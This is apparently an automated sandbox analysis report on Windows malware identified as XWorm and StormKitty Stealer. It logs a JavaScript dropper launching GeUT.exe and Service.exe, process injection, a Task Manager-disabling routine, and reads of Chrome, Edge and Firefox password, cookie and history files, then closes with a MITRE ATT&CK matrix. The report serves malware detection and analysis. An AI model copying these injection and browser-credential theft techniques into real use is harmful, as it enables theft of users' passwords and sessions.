              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 790000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 3D0000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory written: C:\Users\user\AppData\Roaming\Service.exe base: 1B0000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\OLWJMU.js" Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: GeUT.exe, 00000005.00000002.2743028060.000000000311B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0
              Source: GeUT.exe, 00000005.00000002.2743028060.000000000311B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0Te
              Source: GeUT.exe, 00000005.00000002.2743028060.000000000311B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: GeUT.exe, 00000005.00000002.2743028060.000000000311B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
              Source: GeUT.exe, 00000005.00000002.2743028060.000000000311B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managert-
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Contains functionality to disable the Task Manager (.Net Source)
              Source: GeUT.exe.3.dr, Program.cs.Net Code: TaskMan
              Source: 3.2.wscript.exe.1ef379d70e0.1.raw.unpack, Program.cs.Net Code: TaskMan
              Source: 3.3.wscript.exe.1ef34fd67e0.0.raw.unpack, Program.cs.Net Code: TaskMan
              Source: Service.exe.4.dr, Program.cs.Net Code: TaskMan
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected BrowserPasswordDump
              Source: Yara matchFile source: 5.2.GeUT.exe.78e0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.GeUT.exe.78e0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: GeUT.exe PID: 3032, type: MEMORYSTR
              Yara detected StormKitty Stealer
              Source: Yara matchFile source: 5.2.GeUT.exe.78e0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.GeUT.exe.78e0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2743028060.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: GeUT.exe PID: 3032, type: MEMORYSTR
              Yara detected XWorm
              Source: Yara matchFile source: 13.2.Service.exe.2e1383c.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.Service.exe.2dfd39c.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.Service.exe.2e085e0.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.GeUT.exe.2b17ffc.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.GeUT.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.GeUT.exe.2b163a0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.GeUT.exe.2b14768.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.GeUT.exe.2d16a3c.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.Service.exe.2e1383c.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.GeUT.exe.2d14df8.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.GeUT.exe.2d18698.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.Service.exe.2e085e0.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.Service.exe.2dfd39c.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000008.00000002.1656591343.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.1507678117.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.1632367681.0000000002CF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2743028060.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.1706268974.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: GeUT.exe PID: 3120, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: GeUT.exe PID: 3032, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: GeUT.exe PID: 6884, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: GeUT.exe PID: 5664, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Service.exe PID: 2668, type: MEMORYSTR
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqliteJump to behavior
              Source: Yara matchFile source: 5.2.GeUT.exe.78e0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.GeUT.exe.78e0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2743028060.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: GeUT.exe PID: 3032, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected BrowserPasswordDump
              Source: Yara matchFile source: 5.2.GeUT.exe.78e0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.GeUT.exe.78e0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: GeUT.exe PID: 3032, type: MEMORYSTR
              Yara detected StormKitty Stealer
              Source: Yara matchFile source: 5.2.GeUT.exe.78e0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.GeUT.exe.78e0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2743028060.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: GeUT.exe PID: 3032, type: MEMORYSTR
              Yara detected XWorm
              Source: Yara matchFile source: 13.2.Service.exe.2e1383c.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.Service.exe.2dfd39c.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.Service.exe.2e085e0.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.GeUT.exe.2b17ffc.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.GeUT.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.GeUT.exe.2b163a0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.GeUT.exe.2b14768.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.GeUT.exe.2d16a3c.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.Service.exe.2e1383c.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.GeUT.exe.2d14df8.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.GeUT.exe.2d18698.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.Service.exe.2e085e0.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.Service.exe.2dfd39c.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000008.00000002.1656591343.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.1507678117.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.1632367681.0000000002CF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2743028060.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.1706268974.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: GeUT.exe PID: 3120, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: GeUT.exe PID: 3032, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: GeUT.exe PID: 6884, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: GeUT.exe PID: 5664, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Service.exe PID: 2668, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information31
              Scripting              		Valid Accounts11
              Windows Management Instrumentation              		31
              Scripting              		1
              DLL Side-Loading              		11
              Disable or Modify Tools              		1
              OS Credential Dumping              		3
              File and Directory Discovery              		Remote Services11
              Archive Collected Data              		1
              Ingress Tool Transfer              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Native API              		1
              DLL Side-Loading              		212
              Process Injection              		1
              Deobfuscate/Decode Files or Information              		LSASS Memory13
              System Information Discovery              		Remote Desktop Protocol1
              Data from Local System              		1
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution              		11
              Registry Run Keys / Startup Folder              		11
              Registry Run Keys / Startup Folder              		3
              Obfuscated Files or Information              		Security Account Manager111
              Security Software Discovery              		SMB/Windows Admin Shares1
              Clipboard Data              		1
              Non-Standard Port              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
              Software Packing              		NTDS2
              Process Discovery              		Distributed Component Object ModelInput Capture1
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading              		LSA Secrets131
              Virtualization/Sandbox Evasion              		SSHKeylogging111
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              File Deletion              		Cached Domain Credentials1
              Application Window Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
              Masquerading              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Modify Registry              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt131
              Virtualization/Sandbox Evasion              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron212
